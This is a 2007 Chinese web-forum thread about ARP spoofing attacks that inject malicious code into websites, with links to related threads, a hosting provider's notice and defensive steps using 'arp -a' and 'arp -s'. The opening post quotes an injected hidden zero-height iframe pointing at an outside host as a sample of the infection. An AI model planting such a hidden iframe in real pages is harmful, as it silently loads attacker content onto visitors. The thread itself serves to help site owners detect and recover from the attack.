请选择 进入手机版 | 继续访问电脑版
收藏本站腾讯微博新浪微博
邮件列表客服QQ 800003860切换到窄版
点点网模板设计大赛 phpchina

经典论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

蓝色理想 最新研发动态 用悬赏 三天解决问题 解决访问速度慢 论坛支持农历生日 - 给官方提建议

论坛活动及任务 归纳网站最新活动 地图任务 邮件更新任务:保护帐号安全

积分换实物,来参加蓝色理想积分兑换吧! 联系招聘客服 蓝色理想帮你找工作! 万元奖励等你拿——点点网模板设计大赛

经典论坛 论坛 其它技术讨论区 计算机技术 你的网站还好吗?遭遇ARP欺骗,怎么办?
返回列表 发新帖
查看: 5236|回复: 6

[病毒] 你的网站还好吗?遭遇ARP欺骗,怎么办? [复制链接]

birder 楼主

荆棘鸟

版主 手机认证 

帖子
1801
体力
5820
威望
39
居住地
安徽省 铜陵市
发表于 2007-4-12 11:18:33 |显示全部楼层
“ARP欺骗”专题征稿启事

你的网站还好吗?遭遇ARP欺骗,怎么办?说出你的故事,写出你的案例...


最近,有不少会员反映自己的网站遭遇了“ARP欺骗”,莫名其妙地在网页多了“<iframe src='http://s72.911520.net/site/gg/2.htm' height=0 width=50></iframe>”类似的代码,等等网站中毒现象。

看来“ARP欺骗”有进一步流行扩大的趋势,因此我们将一些此方面讨论聚合,希望能给深受其害的会员给予一定启发和帮助。

也欢迎各位经典会员,能将你的解决过程和对“ARP欺骗”独道见解,写出来发表在计算机技术版块,对于原创性的文章我们将给予加分奖励。

服务器被ARP欺骗
http://bbs.blueidea.com/viewthre ... p;extra=&page=1

网站中毒了怎么办?
http://bbs.blueidea.com/thread-2735234-1-1.html

蓝色理想搜索引擎被注入iframe!!病毒
http://bbs.blueidea.com/thread-2735519-1-1.html

替换网站被下木马网页中的iframe
http://bbs.blueidea.com/viewthre ... p;page=1#pid3136881

关于ARP欺骗
http://bbs.blueidea.com/thread-2658992-1-1.html

关于ARP病毒
http://bbs.blueidea.com/thread-2670567-1-1.html

怎么防范Arp攻击?
http://bbs.blueidea.com/thread-2704642-1-1.html

请教各位高手ARP木马攻击怎样才能找到发出攻击命令的机子.
http://bbs.blueidea.com/thread-2722873-1-1.html

迟到的“Arp欺骗”
http://bbs.blueidea.com/thread-2739823-1-1.html

一些大型网站安全频道也有相应专题:

51CTO的专题
http://netsecurity.51cto.com/art/200609/31897.htm

硅谷动力的专题
http://www.enet.com.cn/security/zhuanti/arp/

[ 本帖最后由 birder 于 2007-4-26 10:35 编辑 ]
西部数码顶级域名注册商39元抢注!

使用道具 举报

scmslw 
帖子
119
体力
326
威望
0
发表于 2007-4-12 11:39:18 |显示全部楼层
谢谢了收下了....
态度决定生活:"播下一种思想,收获一种行为;播下一种行为,收获一种习惯;播下一种习惯,收获一种性格;播下一种性格,收获一种命运."
租服务器,上51IDC | [长沙]招聘:PHP经理10K/WEB前端6K/PHP开发6K

使用道具 举报

hengzhezou 

我就横着走

荣誉管理 手机认证 

帖子
2451
体力
9602
威望
2
居住地
四川省 眉山市
发表于 2007-4-13 22:19:13 |显示全部楼层
刚刚看到了大狼狗在自己的blog上写的自己的博客被ARP和解决办法。觉得不错大家也可以看一下
http://www.cnbruce.com/blog/showlog.asp?log_id=1191
小乖乖育儿网

使用道具 举报

dnawo 
帖子
278
体力
356
威望
4
居住地
福建省 福州市
发表于 2007-4-20 14:48:48 |显示全部楼层
前阵子我博客也中招了,打开一片乱码,向客服反映得出的结果却说是编码的问题:(
附件: 你需要登录才可以下载或查看附件。没有帐号?注册
http://www.mzwu.com

使用道具 举报

bieyinan 

别之亦难

银牌会员 手机认证 

帖子
905
体力
1644
威望
0
居住地
广东省 深圳市
发表于 2007-4-20 15:28:45 |显示全部楼层
尊敬的用户:

最近ARP病毒泛滥,服务器大受其害。ARP即Address Resolution Protocol,将网络IP地址映射至网卡硬 件MAC地址的协议。一般危害为欺骗同网段内的其他服务器地址,截获其数据报文、监听数据传输、盗取 帐号信息,甚至对来访数据包进行欺骗和伪造。该病毒发作方式为:网段内一台服务器中此病毒,病毒将 以此机器作为肉鸡,对同网段服务器进行数据劫持和欺骗。类似于夺取同段内的其他服务器的IP,导致合 法服务器无法正常通讯。此病毒还可对网关地址进行欺骗,造成此网段所有IP地址都无法正常解析。以致 网络大面积瘫痪。目前该病毒已经在我司的控制范围内,由电信路由以及交换机上可查获。
请广大客户给予理解和支持,可在服务器上安装相关ARP防范软件进行一定的查杀和抵御。

部分ARP防范工具下载地址为:http://down.cnsun.net/soft/arp%E ... 99/antiarp4.0.2.exe

昨天收到的网管发来的通知
新网/新网互联/西部数码 伙伴代理

使用道具 举报

dnawo 
帖子
278
体力
356
威望
4
居住地
福建省 福州市
发表于 2007-4-21 11:10:28 |显示全部楼层
最近网络上很流行一种攻击方式,在你的所有网页里嵌入病毒或广告代码,有时是不定时出现,但是无论你怎么在自己服务器上面怎么查,都找不出原因。甚至重做系统都没有效果。chinaz也曾中过此类病毒,后来终于找到解决办法,因为这个攻击方式还有很多人都被蒙在鼓里,所以在此公布出来给大家分享,请各位站长及网管多注意!

首先,判断是否受到arp欺骗式攻击。
在你系统的命令行下输入:arp -a

会输出如以下的信息:
  Internet Address      Physical Address      Type
  192.168.0.1           00-0a-eb-e7-ba-14     dynamic

前面的IP地址应该是你服务器的网关,后面的是对应的mac地址。
获取这个信息后,你找到机房或是你所托管的服务商,找他确认一下,这个mac地址是否与机房里交换机的mac一致。(或是找一台正常的相同交换机下面的服务器查一下也可)

如果不一致,那证明你已经受到arp欺骗式攻击。

解决办法: 将你从服务器上获得的mac地址发给网管,让他查出对应的是哪台服务器(一般是与您同网段内的)。要么是那台服务器的机主恶意在搞,要么是那台服务器受人入侵中了毒。只需将那台服务器关掉即可马上恢复正常。
也可以在你服务器上手工设置一下。
设置方法: arp -s 网关IP 网关MAC


摘自chinaz.com
http://www.mzwu.com

使用道具 举报

yougucaofan 
帖子
1163
体力
4277
威望
0
发表于 2007-4-21 23:42:53 |显示全部楼层
收下,本人对电脑常出现的问题都不会处理,这次可帮了我不了的忙了
忍受。一定要学会忍受。

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Html Smilies
您需要登录后才可以回帖 登录 | 注册

Archiver|手机版|安久科技提供CDN|blueidea.com ( 京ICP备05002321号 )  

GMT+8, 2012-2-11 04:51 , Processed in 0.068262 second(s), 10 queries , Gzip On, Memcache On.

Powered by Discuz! X2

© 2001-2011 Comsenz Inc.

回顶部